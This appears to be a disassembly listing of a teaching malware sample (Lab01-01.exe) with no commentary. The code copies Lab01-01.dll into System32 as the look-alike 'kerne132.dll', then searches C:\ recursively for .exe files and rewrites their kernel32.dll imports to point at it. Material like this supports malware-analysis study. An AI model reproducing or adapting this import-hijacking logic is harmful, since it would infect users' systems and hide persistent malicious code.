00001000 MOV EDX, DWORD PTR SS:[EBP+8]
00001004 XOR EAX, EAX
00001006 XOR ECX, ECX
00001008 PUSH EBX
00001009 MOV AX, WORD PTR DS:[EDX+20]
0000100D MOV CX, WORD PTR DS:[EDX+6]
00001011 PUSH ESI
00001012 XOR ESI, ESI
00001014 TEST ECX, ECX
00001016 PUSH EDI
00001017 LEA EAX, DWORD PTR DS:[EAX+EDX+24]
0000101B JLE SHORT 00001039
0000101D MOV EDI, DWORD PTR SS:[ESP+16]
00001021 MOV EDX, DWORD PTR DS:[EAX+12]
00001024 CMP EDI, EDX
00001026 JB SHORT 00001031
00001028 MOV EBX, DWORD PTR DS:[EAX+8]
0000102B ADD EBX, EDX
0000102D CMP EDI, EBX
0000102F JB SHORT 0000103B
00001031 INC ESI
00001032 ADD EAX, 40
00001035 CMP ESI, ECX
00001037 JL SHORT 00001021
00001039 XOR EAX, EAX
0000103B POP EDI
0000103C POP ESI
0000103D POP EBX
0000103E RETN 
0000103F NOP 
00001040 MOV EAX, DWORD PTR SS:[ESP+8]
00001044 PUSH ESI
00001045 MOV ESI, DWORD PTR SS:[ESP+8]
00001049 PUSH EAX
0000104A PUSH ESI
0000104B CALL 00001000
00001050 MOV ECX, EAX
00001052 ADD ESP, 8
00001055 TEST ECX, ECX
00001057 JNZ SHORT 0000105B
00001059 POP ESI
0000105A RETN 
0000105B MOV EAX, DWORD PTR DS:[ECX+20]
0000105E MOV EDX, DWORD PTR DS:[ECX+12]
00001061 MOV ECX, DWORD PTR SS:[ESP+16]
00001065 SUB EAX, EDX
00001067 ADD EAX, ESI
00001069 POP ESI
0000106A ADD EAX, ECX
0000106C RETN 
0000106D NOP 
0000106E NOP 
0000106F NOP 
00001070 MOV EAX, DWORD PTR SS:[ESP+8]
00001074 MOV ECX, DWORD PTR SS:[ESP+4]
00001078 PUSH EAX
00001079 PUSH ECX
0000107A CALL 00001000
0000107F MOV ECX, EAX
00001081 ADD ESP, 8
00001084 TEST ECX, ECX
00001086 JNZ SHORT 00001089
00001088 RETN 
00001089 MOV EAX, DWORD PTR DS:[ECX+12]
0000108C MOV EDX, DWORD PTR DS:[ECX+20]
0000108F MOV ECX, DWORD PTR SS:[ESP+12]
00001093 SUB EAX, EDX
00001095 SUB EAX, ECX
00001097 RETN 
00001098 NOP 
00001099 NOP 
0000109A NOP 
0000109B NOP 
0000109C NOP 
0000109D NOP 
0000109E NOP 
0000109F NOP 
000010A0 SUB ESP, 12
000010A3 PUSH EBX
000010A4 MOV EAX, DWORD PTR SS:[ESP+20]
000010A8 PUSH EBP
000010A9 PUSH ESI
000010AA PUSH EDI
000010AB PUSH 0
000010AD PUSH 0
000010AF PUSH 3
000010B1 PUSH 0
000010B3 PUSH 1
000010B5 PUSH 10000000
000010BA PUSH EAX
000010BB CALL DWORD PTR DS:[402014] (KERNEL32.dll : CreateFileA)
000010C1 PUSH 0
000010C3 PUSH 0
000010C5 PUSH 0
000010C7 PUSH 4
000010C9 PUSH 0
000010CB PUSH EAX
000010CC MOV DWORD PTR SS:[ESP+48], EAX
000010D0 CALL DWORD PTR DS:[402010] (KERNEL32.dll : CreateFileMappingA)
000010D6 PUSH 0
000010D8 PUSH 0
000010DA PUSH 0
000010DC PUSH F001F
000010E1 PUSH EAX
000010E2 MOV DWORD PTR SS:[ESP+40], EAX
000010E6 CALL DWORD PTR DS:[40200C] (KERNEL32.dll : MapViewOfFile)
000010EC MOV ESI, EAX
000010EE TEST ESI, ESI
000010F0 MOV DWORD PTR SS:[ESP+16], ESI
000010F4 JE 000011D5
000010FA MOV EBP, DWORD PTR DS:[ESI+60]
000010FD MOV EBX, DWORD PTR DS:[402008] (KERNEL32.dll : IsBadReadPtr)
00001103 ADD EBP, ESI
00001105 PUSH 4
00001107 PUSH EBP
00001108 CALL EBX
0000110A TEST EAX, EAX
0000110C JNZ 000011D5
00001112 CMP DWORD PTR SS:[EBP], 0
00001119 JNZ 000011D5
0000111F MOV ECX, DWORD PTR SS:[EBP+128]
00001125 PUSH ESI
00001126 PUSH EBP
00001127 PUSH ECX
00001128 CALL 00001040
0000112D ADD ESP, 12
00001130 MOV EDI, EAX
00001132 PUSH 14
00001134 PUSH EDI
00001135 CALL EBX
00001137 TEST EAX, EAX
00001139 JNZ 000011D5
0000113F ADD EDI, 12
00001142 MOV EAX, DWORD PTR DS:[EDI-8]
00001145 MOV DWORD PTR SS:[ESP+32], EDI
00001149 TEST EAX, EAX
0000114B JNZ SHORT 00001152
0000114D CMP DWORD PTR DS:[EDI], 0
00001150 JE SHORT 000011AC
00001152 MOV EDX, DWORD PTR DS:[EDI]
00001154 PUSH ESI
00001155 PUSH EBP
00001156 PUSH EDX
00001157 CALL 00001040
0000115C ADD ESP, 12
0000115F MOV EBX, EAX
00001161 PUSH 14
00001163 PUSH EBX
00001164 CALL DWORD PTR DS:[402008] (KERNEL32.dll : IsBadReadPtr)
0000116A TEST EAX, EAX
0000116C JNZ SHORT 000011D5
0000116E PUSH 3020 (kernel32.dll)
00001173 PUSH EBX
00001174 CALL DWORD PTR DS:[402064] (MSVCRT.dll : _stricmp)
0000117A ADD ESP, 8
0000117D TEST EAX, EAX
0000117F JNZ SHORT 000011A7
00001181 MOV EDI, EAX
00001183 OR ECX, FFFFFFFF
00001186 REPNE SCAS BYTE PTR ES:[EDI]
00001188 NOT ECX
0000118A MOV EAX, ECX
0000118C MOV ESI, 403010
00001191 MOV EDI, EAX
00001193 SHR ECX, 2
00001196 REP MOVS DWORD PTR ES:[EDI], DWORD PTR DS:[ESI]
00001198 MOV ECX, EAX
0000119A AND ECX, 3
0000119D REP MOVS BYTE PTR ES:[EDI], BYTE PTR DS:[ESI]
0000119F MOV ESI, DWORD PTR SS:[ESP+16]
000011A3 MOV EDI, DWORD PTR SS:[ESP+32]
000011A7 ADD EDI, 20
000011AA JMP SHORT 00001142
000011AC ADD EBP, 208
000011B2 XOR ECX, ECX
000011B4 PUSH ESI
000011B5 MOV DWORD PTR SS:[EBP+0], ECX
000011B8 MOV DWORD PTR SS:[EBP+4], ECX
000011BB CALL DWORD PTR DS:[402004] (KERNEL32.dll : UnmapViewOfFile)
000011C1 MOV EDX, DWORD PTR SS:[EBP+20]
000011C5 MOV ESI, DWORD PTR DS:[402000] (KERNEL32.dll : CloseHandle)
000011CB PUSH EDX
000011CC CALL ESI
000011CE MOV EAX, DWORD PTR SS:[ESP+24]
000011D2 PUSH EAX
000011D3 CALL ESI
000011D5 POP EDI
000011D6 POP ESI
000011D7 POP EBP
000011D8 POP EBX
000011D9 ADD ESP, 12
000011DC RETN 
000011DD NOP 
000011DE NOP 
000011DF NOP 
000011E0 MOV EAX, DWORD PTR SS:[ESP+8]
000011E4 SUB ESP, 324
000011EA CMP EAX, 7
000011ED PUSH EBX
000011EE PUSH EBP
000011EF PUSH ESI
000011F0 PUSH EDI
000011F1 JG 00001434
000011F7 MOV EBP, DWORD PTR SS:[ESP+344]
000011FE LEA EAX, DWORD PTR SS:[ESP+20]
00001202 PUSH EAX
00001203 PUSH EBP
00001204 CALL DWORD PTR DS:[402020] (KERNEL32.dll : FindFirstFileA)
0000120A MOV ESI, EAX
0000120C MOV DWORD PTR SS:[ESP+16], ESI
00001210 CMP ESI, -1
00001213 JE 0000142C
00001219 TEST BYTE PTR SS:[ESP+20], 16
0000121E JE 0000135C
00001224 MOV ESI, 403040
00001229 LEA EAX, DWORD PTR SS:[ESP+64]
0000122D MOV DL, BYTE PTR DS:[EAX]
0000122F MOV BL, BYTE PTR DS:[ESI]
00001231 MOV CL, DL
00001233 CMP DL, BL
00001235 JNZ SHORT 00001255
00001237 TEST CL, CL
00001239 JE SHORT 00001251
0000123B MOV DL, BYTE PTR DS:[EAX+1]
0000123E MOV BL, BYTE PTR DS:[ESI+1]
00001241 MOV CL, DL
00001243 CMP DL, BL
00001245 JNZ SHORT 00001255
00001247 ADD EAX, 2
0000124A ADD ESI, 2
0000124D TEST CL, CL
0000124F JNZ SHORT 0000122D
00001251 XOR EAX, EAX
00001253 JMP SHORT 0000125A
00001255 SBB EAX, EAX
00001257 SBB EAX, -1
0000125A TEST EAX, EAX
0000125C JE 0000135C
00001262 MOV ESI, 40303C
00001267 LEA EAX, DWORD PTR SS:[ESP+64]
0000126B MOV DL, BYTE PTR DS:[EAX]
0000126D MOV BL, BYTE PTR DS:[ESI]
0000126F MOV CL, DL
00001271 CMP DL, BL
00001273 JNZ SHORT 00001293
00001275 TEST CL, CL
00001277 JE SHORT 0000128F
00001279 MOV DL, BYTE PTR DS:[EAX+1]
0000127C MOV BL, BYTE PTR DS:[ESI+1]
0000127F MOV CL, DL
00001281 CMP DL, BL
00001283 JNZ SHORT 00001293
00001285 ADD EAX, 2
00001288 ADD ESI, 2
0000128B TEST CL, CL
0000128D JNZ SHORT 0000126B
0000128F XOR EAX, EAX
00001291 JMP SHORT 00001298
00001293 SBB EAX, EAX
00001295 SBB EAX, -1
00001298 TEST EAX, EAX
0000129A JE 0000135C
000012A0 LEA EDI, DWORD PTR SS:[ESP+64]
000012A4 OR ECX, FFFFFFFF
000012A7 XOR EAX, EAX
000012A9 REPNE SCAS BYTE PTR ES:[EDI]
000012AB NOT ECX
000012AD DEC ECX
000012AE MOV EDI, EBP
000012B0 MOV EDX, ECX
000012B2 OR ECX, FFFFFFFF
000012B5 REPNE SCAS BYTE PTR ES:[EDI]
000012B7 NOT ECX
000012B9 DEC ECX
000012BA LEA EAX, DWORD PTR DS:[ECX+EDX*2+6]
000012BE PUSH EAX
000012BF CALL DWORD PTR DS:[40202C] (MSVCRT.dll : malloc)
000012C5 MOV EDX, EAX
000012C7 OR ECX, FFFFFFFF
000012CA MOV EDI, EBP
000012CC XOR EAX, EAX
000012CE REPNE SCAS BYTE PTR ES:[EDI]
000012D0 NOT ECX
000012D2 SUB EDI, ECX
000012D4 MOV EAX, ECX
000012D6 MOV ESI, EDI
000012D8 SHR ECX, 2
000012DB MOV EDI, EDX
000012DD REP MOVS DWORD PTR ES:[EDI], DWORD PTR DS:[ESI]
000012DF MOV ECX, EAX
000012E1 XOR EAX, EAX
000012E3 AND ECX, 3
000012E6 REP MOVS BYTE PTR ES:[EDI], BYTE PTR DS:[ESI]
000012E8 OR ECX, FFFFFFFF
000012EB MOV EDI, EBP
000012ED REPNE SCAS BYTE PTR ES:[EDI]
000012EF NOT ECX
000012F1 DEC ECX
000012F2 LEA EDI, DWORD PTR SS:[ESP+68]
000012F6 MOV BYTE PTR DS:[ECX+EDX-1], AL
000012FA OR ECX, FFFFFFFF
000012FD REPNE SCAS BYTE PTR ES:[EDI]
000012FF NOT ECX
00001301 SUB EDI, ECX
00001303 MOV ESI, EDI
00001305 MOV EBX, ECX
00001307 MOV EDI, EDX
00001309 OR ECX, FFFFFFFF
0000130C REPNE SCAS BYTE PTR ES:[EDI]
0000130E MOV ECX, EBX
00001310 DEC EDI
00001311 SHR ECX, 2
00001314 REP MOVS DWORD PTR ES:[EDI], DWORD PTR DS:[ESI]
00001316 MOV ECX, EBX
00001318 AND ECX, 3
0000131B REP MOVS BYTE PTR ES:[EDI], BYTE PTR DS:[ESI]
0000131D MOV EDI, 403038
00001322 OR ECX, FFFFFFFF
00001325 REPNE SCAS BYTE PTR ES:[EDI]
00001327 NOT ECX
00001329 SUB EDI, ECX
0000132B MOV ESI, EDI
0000132D MOV EBX, ECX
0000132F MOV EDI, EDX
00001331 OR ECX, FFFFFFFF
00001334 REPNE SCAS BYTE PTR ES:[EDI]
00001336 MOV ECX, EBX
00001338 DEC EDI
00001339 SHR ECX, 2
0000133C REP MOVS DWORD PTR ES:[EDI], DWORD PTR DS:[ESI]
0000133E MOV ECX, EBX
00001340 AND ECX, 3
00001343 REP MOVS BYTE PTR ES:[EDI], BYTE PTR DS:[ESI]
00001345 MOV ECX, DWORD PTR SS:[ESP+352]
0000134C INC ECX
0000134D PUSH ECX
0000134E PUSH EDX
0000134F CALL 000011E0
00001354 ADD ESP, 12
00001357 JMP 00001413
0000135C LEA EDI, DWORD PTR SS:[ESP+64]
00001360 OR ECX, FFFFFFFF
00001363 XOR EAX, EAX
00001365 REPNE SCAS BYTE PTR ES:[EDI]
00001367 NOT ECX
00001369 DEC ECX
0000136A MOV EDI, EBP
0000136C LEA EBX, DWORD PTR SS:[ESP+ECX+60]
00001370 OR ECX, FFFFFFFF
00001373 REPNE SCAS BYTE PTR ES:[EDI]
00001375 NOT ECX
00001377 DEC ECX
00001378 LEA EDI, DWORD PTR SS:[ESP+64]
0000137C MOV EDX, ECX
0000137E OR ECX, FFFFFFFF
00001381 REPNE SCAS BYTE PTR ES:[EDI]
00001383 NOT ECX
00001385 DEC ECX
00001386 LEA EAX, DWORD PTR DS:[EDX+ECX+1]
0000138A PUSH EAX
0000138B CALL DWORD PTR DS:[40202C] (MSVCRT.dll : malloc)
00001391 MOV EDX, DWORD PTR SS:[ESP+348]
00001398 MOV EBP, EAX
0000139A MOV EDI, EDX
0000139C OR ECX, FFFFFFFF
0000139F XOR EAX, EAX
000013A1 PUSH 3030 (.exe)
000013A6 REPNE SCAS BYTE PTR ES:[EDI]
000013A8 NOT ECX
000013AA SUB EDI, ECX
000013AC PUSH EBX
000013AD MOV EAX, ECX
000013AF MOV ESI, EDI
000013B1 MOV EDI, EBP
000013B3 SHR ECX, 2
000013B6 REP MOVS DWORD PTR ES:[EDI], DWORD PTR DS:[ESI]
000013B8 MOV ECX, EAX
000013BA XOR EAX, EAX
000013BC AND ECX, 3
000013BF REP MOVS BYTE PTR ES:[EDI], BYTE PTR DS:[ESI]
000013C1 MOV EDI, EDX
000013C3 OR ECX, FFFFFFFF
000013C6 REPNE SCAS BYTE PTR ES:[EDI]
000013C8 NOT ECX
000013CA DEC ECX
000013CB LEA EDI, DWORD PTR SS:[ESP+76]
000013CF MOV BYTE PTR DS:[ECX+EBP-1], AL
000013D3 OR ECX, FFFFFFFF
000013D6 REPNE SCAS BYTE PTR ES:[EDI]
000013D8 NOT ECX
000013DA SUB EDI, ECX
000013DC MOV ESI, EDI
000013DE MOV EDX, ECX
000013E0 MOV EDI, EBP
000013E2 OR ECX, FFFFFFFF
000013E5 REPNE SCAS BYTE PTR ES:[EDI]
000013E7 MOV ECX, EDX
000013E9 DEC EDI
000013EA SHR ECX, 2
000013ED REP MOVS DWORD PTR ES:[EDI], DWORD PTR DS:[ESI]
000013EF MOV ECX, EDX
000013F1 AND ECX, 3
000013F4 REP MOVS BYTE PTR ES:[EDI], BYTE PTR DS:[ESI]
000013F6 CALL DWORD PTR DS:[402064] (MSVCRT.dll : _stricmp)
000013FC ADD ESP, 12
000013FF TEST EAX, EAX
00001401 JNZ SHORT 0000140C
00001403 PUSH EBP
00001404 CALL 000010A0
00001409 ADD ESP, 4
0000140C MOV EBP, DWORD PTR SS:[ESP+344]
00001413 MOV ESI, DWORD PTR SS:[ESP+16]
00001417 LEA EAX, DWORD PTR SS:[ESP+20]
0000141B PUSH EAX
0000141C PUSH ESI
0000141D CALL DWORD PTR DS:[40201C] (KERNEL32.dll : FindNextFileA)
00001423 TEST EAX, EAX
00001425 JE SHORT 00001434
00001427 JMP 00001210
0000142C PUSH FFFFFFFF
0000142E CALL DWORD PTR DS:[402018] (KERNEL32.dll : FindClose)
00001434 POP EDI
00001435 POP ESI
00001436 POP EBP
00001437 POP EBX
00001438 ADD ESP, 324
0000143E RETN 
0000143F NOP 
00001440 MOV EAX, DWORD PTR SS:[ESP+4]
00001444 SUB ESP, 68
00001447 CMP EAX, 2
0000144A PUSH EBX
0000144B PUSH EBP
0000144C PUSH ESI
0000144D PUSH EDI
0000144E JNZ 00001813
00001454 MOV EAX, DWORD PTR SS:[ESP+92]
00001458 MOV ESI, 4030B0
0000145D MOV EAX, DWORD PTR DS:[EAX+4]
00001460 MOV DL, BYTE PTR DS:[EAX]
00001462 MOV BL, BYTE PTR DS:[ESI]
00001464 MOV CL, DL
00001466 CMP DL, BL
00001468 JNZ SHORT 00001488
0000146A TEST CL, CL
0000146C JE SHORT 00001484
0000146E MOV DL, BYTE PTR DS:[EAX+1]
00001471 MOV BL, BYTE PTR DS:[ESI+1]
00001474 MOV CL, DL
00001476 CMP DL, BL
00001478 JNZ SHORT 00001488
0000147A ADD EAX, 2
0000147D ADD ESI, 2
00001480 TEST CL, CL
00001482 JNZ SHORT 00001460
00001484 XOR EAX, EAX
00001486 JMP SHORT 0000148D
00001488 SBB EAX, EAX
0000148A SBB EAX, -1
0000148D TEST EAX, EAX
0000148F JNZ 00001813
00001495 MOV EDI, DWORD PTR DS:[402014] (KERNEL32.dll : CreateFileA)
0000149B PUSH EAX
0000149C PUSH EAX
0000149D PUSH 3
0000149F PUSH EAX
000014A0 PUSH 1
000014A2 PUSH 80000000
000014A7 PUSH 308C (C:\Windows\System32\Kernel32.dll)
000014AC CALL EDI
000014AE MOV EBX, DWORD PTR DS:[402010] (KERNEL32.dll : CreateFileMappingA)
000014B4 PUSH 0
000014B6 PUSH 0
000014B8 PUSH 0
000014BA PUSH 2
000014BC PUSH 0
000014BE PUSH EAX
000014BF MOV DWORD PTR SS:[ESP+100], EAX
000014C3 CALL EBX
000014C5 MOV EBP, DWORD PTR DS:[40200C] (KERNEL32.dll : MapViewOfFile)
000014CB PUSH 0
000014CD PUSH 0
000014CF PUSH 0
000014D1 PUSH 4
000014D3 PUSH EAX
000014D4 CALL EBP
000014D6 PUSH 0
000014D8 PUSH 0
000014DA PUSH 3
000014DC PUSH 0
000014DE PUSH 1
000014E0 MOV ESI, EAX
000014E2 PUSH 10000000
000014E7 PUSH 307C (Lab01-01.dll)
000014EC MOV DWORD PTR SS:[ESP+116], ESI
000014F0 CALL EDI
000014F2 CMP EAX, -1
000014F5 MOV DWORD PTR SS:[ESP+80], EAX
000014F9 PUSH 0
000014FB JNZ SHORT 00001503
000014FD CALL DWORD PTR DS:[402030] (MSVCRT.dll : exit)
00001503 PUSH 0
00001505 PUSH 0
00001507 PUSH 4
00001509 PUSH 0
0000150B PUSH EAX
0000150C CALL EBX
0000150E CMP EAX, -1
00001511 PUSH 0
00001513 JNZ SHORT 0000151B
00001515 CALL DWORD PTR DS:[402030] (MSVCRT.dll : exit)
0000151B PUSH 0
0000151D PUSH 0
0000151F PUSH F001F
00001524 PUSH EAX
00001525 CALL EBP
00001527 MOV EBP, EAX
00001529 TEST EBP, EBP
0000152B MOV DWORD PTR SS:[EBP+92], EBP
0000152F JNZ SHORT 00001538
00001531 PUSH EAX
00001532 CALL DWORD PTR DS:[402030] (MSVCRT.dll : exit)
00001538 MOV EDI, DWORD PTR DS:[ESI+60]
0000153B PUSH ESI
0000153C ADD EDI, ESI
0000153E PUSH EDI
0000153F MOV DWORD PTR SS:[ESP+64], EDI
00001543 MOV EAX, DWORD PTR DS:[EDI+120]
00001546 PUSH EAX
00001547 CALL 00001040
0000154C MOV ESI, DWORD PTR SS:[EBP+60]
0000154F PUSH EBP
00001550 ADD ESI, EBP
00001552 MOV EBX, EAX
00001554 PUSH ESI
00001555 MOV DWORD PTR SS:[ESP+56], EBX
00001559 MOV ECX, DWORD PTR DS:[ESI+120]
0000155C PUSH ECX
0000155D CALL 00001040
00001562 MOV EDX, DWORD PTR SS:[EBP+112]
00001566 MOV EBP, EAX
00001568 MOV EAX, DWORD PTR DS:[EBX+28]
0000156B PUSH EDX
0000156C PUSH EDI
0000156D PUSH EAX
0000156E CALL 00001040
00001573 MOV ECX, DWORD PTR SS:[ESP+124]
00001577 MOV EDX, DWORD PTR DS:[EBX+36]
0000157A PUSH ECX
0000157B PUSH EDI
0000157C PUSH EDX
0000157D MOV DWORD PTR SS:[ESP+76], EAX
00001581 CALL 00001040
00001586 MOV ECX, DWORD PTR DS:[EBX+32]
00001589 MOV DWORD PTR SS:[ESP+100], EAX
0000158D MOV EAX, DWORD PTR SS:[ESP+136]
00001594 PUSH EAX
00001595 PUSH EDI
00001596 PUSH ECX
00001597 CALL 00001040
0000159C MOV EDX, DWORD PTR SS:[ESP+152]
000015A3 MOV EDI, DWORD PTR DS:[ESI+124]
000015A6 MOV DWORD PTR SS:[ESP+108], EAX
000015AA MOV EAX, DWORD PTR DS:[ESI+120]
000015AD PUSH EDX
000015AE PUSH ESI
000015AF PUSH EAX
000015B0 CALL 00001070
000015B5 MOV ECX, EDI
000015B7 MOV ESI, EBX
000015B9 MOV EDX, ECX
000015BB MOV EDI, EBP
000015BD SHR ECX, 2
000015C0 REP MOVS DWORD PTR ES:[EDI], DWORD PTR DS:[ESI]
000015C2 MOV ECX, EDX
000015C4 ADD ESP, 72
000015C7 AND ECX, 3
000015CA MOV DWORD PTR SS:[ESP+60], EAX
000015CE REP MOVS BYTE PTR ES:[EDI], BYTE PTR DS:[ESI]
000015D0 MOV ECX, DWORD PTR DS:[EBX+20]
000015D3 MOV DWORD PTR SS:[EBP+20], ECX
000015D6 MOV EDX, DWORD PTR DS:[EBX+24]
000015D9 LEA EBX, DWORD PTR SS:[EBP+40]
000015DC MOV DWORD PTR SS:[EBP+24], EDX
000015DF SHL ECX, 4
000015E2 LEA EDX, DWORD PTR DS:[EBX+EAX]
000015E5 MOV DWORD PTR SS:[EBP+12], EDX
000015E8 MOV ESI, DWORD PTR DS:[403010] (kern)
000015EE MOV EDX, EBX
000015F0 ADD EBX, 16
000015F3 MOV DWORD PTR SS:[ESP+32], EBX
000015F7 MOV DWORD PTR DS:[EDX], ESI
000015F9 MOV ESI, DWORD PTR DS:[403014] (e132)
000015FF MOV DWORD PTR DS:[EDX+4], ESI
00001602 MOV ESI, DWORD PTR DS:[403018] (.dll)
00001608 MOV DWORD PTR DS:[EDX+8], ESI
0000160B MOV ESI, DWORD PTR DS:[40301C]
00001611 MOV DWORD PTR DS:[EDX+12], ESI
00001614 MOV EDX, DWORD PTR SS:[EBP+20]
00001617 LEA ESI, DWORD PTR DS:[EBX+EDX*4]
0000161A LEA EDI, DWORD PTR DS:[EBX+EDX*8]
0000161D MOV DWORD PTR SS:[ESP+72], ESI
00001621 MOV DWORD PTR SS:[ESP+68], EDI
00001625 LEA EDX, DWORD PTR DS:[EBX+EAX]
00001628 ADD EBX, ECX
0000162A MOV DWORD PTR SS:[EBP+28], EDX
0000162D LEA EDX, DWORD PTR DS:[ESI+EAX]
00001630 ADD EAX, EDI
00001632 MOV DWORD PTR SS:[EBP+36], EDX
00001635 MOV DWORD PTR SS:[EBP+32], EAX
00001638 MOV EAX, DWORD PTR SS:[ESP+36]
0000163C XOR ECX, ECX
0000163E XOR EDX, EDX
00001640 MOV EBP, DWORD PTR DS:[EAX+20]
00001643 MOV DWORD PTR SS:[ESP+92], ECX
00001647 TEST EBP, EBP
00001649 MOV DWORD PTR SS:[ESP+44], EDX
0000164D JBE 000017D4
00001653 MOV EBP, DWORD PTR SS:[ESP+28]
00001657 CMP DWORD PTR SS:[EBP+0], 0
0000165B JE 000017B9
00001661 MOV EBP, DWORD PTR DS:[EAX+24]
00001664 MOV DWORD PTR SS:[ESP+40], 0
0000166C TEST EBP, EBP
0000166E JBE 000017B9
00001674 MOV EBP, DWORD PTR SS:[ESP+32]
00001678 LEA EBP, DWORD PTR SS:[EBP+ECX*4]
0000167C LEA ECX, DWORD PTR DS:[ESI+ECX*2]
0000167F MOV ESI, DWORD PTR SS:[ESP+32]
00001683 MOV DWORD PTR SS:[ESP+16], ECX
00001687 MOV ECX, DWORD PTR SS:[ESP+48]
0000168B MOV DWORD PTR SS:[ESP+24], ECX
0000168F MOV ECX, DWORD PTR SS:[ESP+52]
00001693 MOV DWORD PTR SS:[ESP+20], ECX
00001697 MOV ECX, EDI
00001699 SUB ECX, ESI
0000169B MOV DWORD PTR SS:[ESP+64], ECX
0000169F MOV ESI, DWORD PTR SS:[ESP+20]
000016A3 XOR ECX, ECX
000016A5 MOV CX, WORD PTR DS:[ESI]
000016A8 CMP ECX, EDX
000016AA JNZ 00001783
000016B0 MOV EDX, DWORD PTR SS:[EBP+88]
000016B4 MOV ECX, DWORD PTR SS:[ESP+24]
000016B8 MOV EAX, DWORD PTR SS:[ESP+56]
000016BC PUSH EDX
000016BD MOV EDX, DWORD PTR DS:[ECX]
000016BF PUSH EAX
000016C0 PUSH EDX
000016C1 CALL 00001040
000016C6 MOV EDX, EAX
000016C8 OR ECX, FFFFFFFF
000016CB MOV EDI, EDX
000016CD XOR EAX, EAX
000016CF ADD ESP, 12
000016D2 MOV ESI, EDX
000016D4 REPNE SCAS BYTE PTR ES:[EDI]
000016D6 NOT ECX
000016D8 MOV EAX, ECX
000016DA MOV EDI, EAX
000016DC SHR ECX, 2
000016DF REP MOVS DWORD PTR ES:[EDI], DWORD PTR DS:[ESI]
000016E1 MOV ECX, EAX
000016E3 MOV EAX, DWORD PTR SS:[ESP+16]
000016E7 AND ECX, 3
000016EA REP MOVS BYTE PTR ES:[EDI], BYTE PTR DS:[ESI]
000016EC MOV CX, WORD PTR SS:[ESP+92]
000016F1 MOV ESI, DWORD PTR SS:[ESP+60]
000016F5 MOV WORD PTR DS:[EAX], CX
000016F8 MOV EAX, DWORD PTR SS:[ESP+64]
000016FC LEA ECX, DWORD PTR DS:[EBX+ESI]
000016FF MOV EDI, EDX
00001701 MOV DWORD PTR DS:[EAX+EBP], ECX
00001704 OR ECX, FFFFFFFF
00001707 XOR EAX, EAX
00001709 REPNE SCAS BYTE PTR ES:[EDI]
0000170B NOT ECX
0000170D DEC ECX
0000170E MOV EDI, EDX
00001710 LEA EBX, DWORD PTR DS:[EBX+ECX+1]
00001714 MOV EAX, EBX
00001716 LEA ECX, DWORD PTR DS:[EBX+ESI]
00001719 ADD EBX, 9
0000171C MOV DWORD PTR SS:[EBP+0], ECX
0000171F MOV ECX, DWORD PTR DS:[403070] (Kern)
00001725 MOV DWORD PTR DS:[EAX], ECX
00001727 MOV ECX, DWORD PTR DS:[403074] (el32)
0000172D MOV ESI, EDX
0000172F MOV DWORD PTR DS:[EAX+4], ECX
00001732 MOV CL, BYTE PTR DS:[403078] (.)
00001738 MOV BYTE PTR DS:[EAX+8], CL
0000173B OR ECX, FFFFFFFF
0000173E XOR EAX, EAX
00001740 REPNE SCAS BYTE PTR ES:[EDI]
00001742 NOT ECX
00001744 MOV EAX, ECX
00001746 MOV EDI, EAX
00001748 SHR ECX, 2
0000174B REP MOVS DWORD PTR ES:[EDI], DWORD PTR DS:[ESI]
0000174D MOV ECX, EAX
0000174F XOR EAX, EAX
00001751 AND ECX, 3
00001754 REP MOVS BYTE PTR ES:[EDI], BYTE PTR DS:[ESI]
00001756 MOV EDI, EDX
00001758 OR ECX, FFFFFFFF
0000175B REPNE SCAS BYTE PTR ES:[EDI]
0000175D MOV EDX, DWORD PTR SS:[EBP+92]
00001761 MOV EAX, DWORD PTR SS:[ESP+36]
00001765 NOT ECX
00001767 DEC ECX
00001768 INC EDX
00001769 MOV DWORD PTR SS:[ESP+92], EDX
0000176D MOV EDX, DWORD PTR SS:[EBP+44]
00001771 LEA EBX, DWORD PTR DS:[EBX+ECX+1]
00001775 MOV ECX, DWORD PTR SS:[ESP+16]
00001779 ADD ECX, 2
0000177C ADD EBP, 4
0000177F MOV DWORD PTR SS:[ESP+16], ECX
00001783 MOV ESI, DWORD PTR SS:[ESP+20]
00001787 MOV ECX, DWORD PTR SS:[ESP+40]
0000178B MOV EDI, DWORD PTR SS:[ESP+24]
0000178F ADD ESI, 2
00001792 MOV DWORD PTR SS:[ESP+20], ESI
00001796 MOV ESI, DWORD PTR DS:[EAX+24]
00001799 INC ECX
0000179A ADD EDI, 4
0000179D CMP ECX, ESI
0000179F MOV DWORD PTR SS:[ESP+40], ECX
000017A3 MOV DWORD PTR SS:[ESP+24], EDI
000017A7 JB 0000169F
000017AD MOV ECX, DWORD PTR SS:[ESP+92]
000017B1 MOV EDI, DWORD PTR SS:[ESP+68]
000017B5 MOV ESI, DWORD PTR SS:[ESP+72]
000017B9 MOV EBP, DWORD PTR SS:[ESP+28]
000017BD INC EDX
000017BE ADD EBP, 4
000017C1 MOV DWORD PTR SS:[ESP+44], EDX
000017C5 MOV DWORD PTR SS:[EBP+28], EBP
000017C9 MOV EBP, DWORD PTR DS:[EAX+20]
000017CC CMP EDX, EBP
000017CE JB 00001653
000017D4 MOV ECX, DWORD PTR SS:[ESP+76]
000017D8 MOV ESI, DWORD PTR DS:[402000] (KERNEL32.dll : CloseHandle)
000017DE PUSH ECX
000017DF CALL ESI
000017E1 MOV EDX, DWORD PTR SS:[EBP+80]
000017E5 PUSH EDX
000017E6 CALL ESI
000017E8 PUSH 0
000017EA PUSH 304C (C:\windows\system32\kerne132.dll)
000017EF PUSH 307C (Lab01-01.dll)
000017F4 CALL DWORD PTR DS:[402024] (KERNEL32.dll : CopyFileA)
000017FA TEST EAX, EAX
000017FC PUSH 0
000017FE JNZ SHORT 00001806
00001800 CALL DWORD PTR DS:[402030] (MSVCRT.dll : exit)
00001806 PUSH 3044 (C:\*)
0000180B CALL 000011E0
00001810 ADD ESP, 8
00001813 POP EDI
00001814 POP ESI
00001815 POP EBP
00001816 XOR EAX, EAX
00001818 POP EBX
00001819 ADD ESP, 68
0000181C RETN 
0000181D NOP 
0000181E NOP 
0000181F NOP 
